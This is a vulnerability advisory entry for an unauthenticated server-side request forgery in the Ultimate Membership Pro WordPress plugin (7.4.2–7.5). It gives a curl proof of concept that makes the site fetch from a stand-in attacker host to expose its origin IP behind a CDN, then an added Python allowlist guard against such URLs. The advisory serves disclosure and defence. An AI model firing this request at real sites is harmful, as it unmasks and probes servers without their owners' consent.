indeed-membership-pro (Ultimate Membership Pro) 7.4.2 to 7.5 - Arbitrary Media Include (SSRF via imgUrl)

Description
Versions of the plugin from at least 7.4.2 up to 7.5 expose an image-processing endpoint, wp-content/plugins/indeed-membership-pro/public/ajax-upload.php, that accepts an imgUrl parameter alongside the usual crop, resize and rotation parameters. The server fetches whatever URL imgUrl names before processing it, so in addition to cropping, rotating or resizing an image of your choosing you can make the WordPress host issue an HTTP request to any site you want (a server-side request forgery primitive). The most obvious use is origin disclosure: point imgUrl at a host you control, and the request that shows up in that host's logs is made by the origin server itself rather than by the fronting proxy, so its source address is the origin's real IP even when the site sits behind a third-party WAF or CDN such as Fastly, Cloudflare or Sucuri. The PoC as published carries no session cookie or nonce, so test it unauthenticated first; the remaining parameters are the crop/rotation values and are set to placeholder values (1, rotation 0) in the PoC.

Proof of Concept

Replace some-evil-host.evil with a host whose access log you can read and vulnerable.host with the target:

curl -d "imgUrl=https://some-evil-host.evil/pwned.png" \
     -d 'imgInitW=1' -d 'imgInitH=1' -d 'imgW=1' -d 'imgH=1' \
     -d 'imgY1=1' -d 'imgX1=1' -d 'cropW=1' -d 'cropH=1' -d 'rotation=0' \
     https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php
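A server-side guard for a fetch-by-URL parameter like imgUrl, as an added example that is not code from the plugin or from the researcher (the actual 7.6 fix is not published on this page). It assumes the site is served as https://vulnerable.host, the placeholder hostname from the PoC, and that the only legitimate use of imgUrl is re-processing an image already hosted under that site. It rejects the PoC URL, literal internal addresses (including the cloud metadata range), non-http schemes, userinfo tricks and non-standard ports before any fetch occurs:

```python
"""SSRF guard for a fetch-by-URL image parameter such as imgUrl.

Added illustration, not the plugin's own code. Assumes the site is served as
https://vulnerable.host (the PoC's placeholder hostname) and that legitimate
requests only ever point at images under that site's own URL space.
"""
import ipaddress
from urllib.parse import urlsplit

# Hosts the server is allowed to fetch from. Assumption for this example:
# only the site itself.
ALLOWED_HOSTS = {"vulnerable.host"}
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}
MAX_URL_LEN = 2048


def _is_non_public_ip(host: str) -> bool:
    """True if host is a literal IP a web server should never be made to
    fetch from: loopback, link-local (cloud metadata at 169.254.169.254),
    RFC 1918 / ULA private ranges, multicast, reserved or unspecified.
    Hostnames (non-literal) return False and are handled by the allowlist."""
    try:
        ip = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return False
    return not ip.is_global


def check_img_url(url) -> tuple:
    """Return (allowed, reason).

    Accept only http(s) URLs whose host is exactly an allow-listed hostname
    on a standard port, with no userinfo and no literal IP address. Anything
    else, including the PoC's attacker-controlled host, is rejected before
    any network request is made."""
    if not isinstance(url, str) or not url or len(url) > MAX_URL_LEN:
        return False, "missing or oversized URL"
    try:
        parts = urlsplit(url)
    except ValueError:
        return False, "unparseable URL"

    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parts.scheme

    # https://vulnerable.host@evil.example/ parses with host evil.example;
    # refuse userinfo outright instead of trying to reason about it.
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"

    host = parts.hostname  # already lower-cased, brackets stripped for IPv6
    if not host:
        return False, "no host"

    try:
        port = parts.port  # raises ValueError on a non-numeric port
    except ValueError:
        return False, "invalid port"
    if port is None:
        port = 443 if scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        return False, "port not allowed: %d" % port

    if _is_non_public_ip(host):
        return False, "non-public address: %s" % host

    if host.rstrip(".") not in ALLOWED_HOSTS:
        return False, "host not allow-listed: %s" % host

    return True, "ok"


if __name__ == "__main__":
    # The PoC value from this advisory, plus a legitimate same-site image.
    for candidate in ("https://some-evil-host.evil/pwned.png",
                      "https://vulnerable.host/wp-content/uploads/a.png",
                      "http://169.254.169.254/latest/meta-data/"):
        print(candidate, "->", check_img_url(candidate))
```

check_img_url does no DNS resolution and so leans on an exact hostname allowlist rather than on resolving and classifying addresses; the fetch that follows it should also refuse to follow redirects (or re-run the check on each redirect target), since an allow-listed host that answers with a 302 to an internal address reintroduces the problem.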

Affects Plugin

fixed in version 7.6

References

URL https://codecanyon.net/comments/21539595

Classification

Type UNKNOWN

Miscellaneous

Original Researcher James Fraser
Submitter fwaggle
Submitter Twitter fwaggle
Views 1294
Verified No
WPVDB ID 9294

Timeline

Publicly Published 2019-02-26
Added 2019-05-27
Last Updated 2019-05-27

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.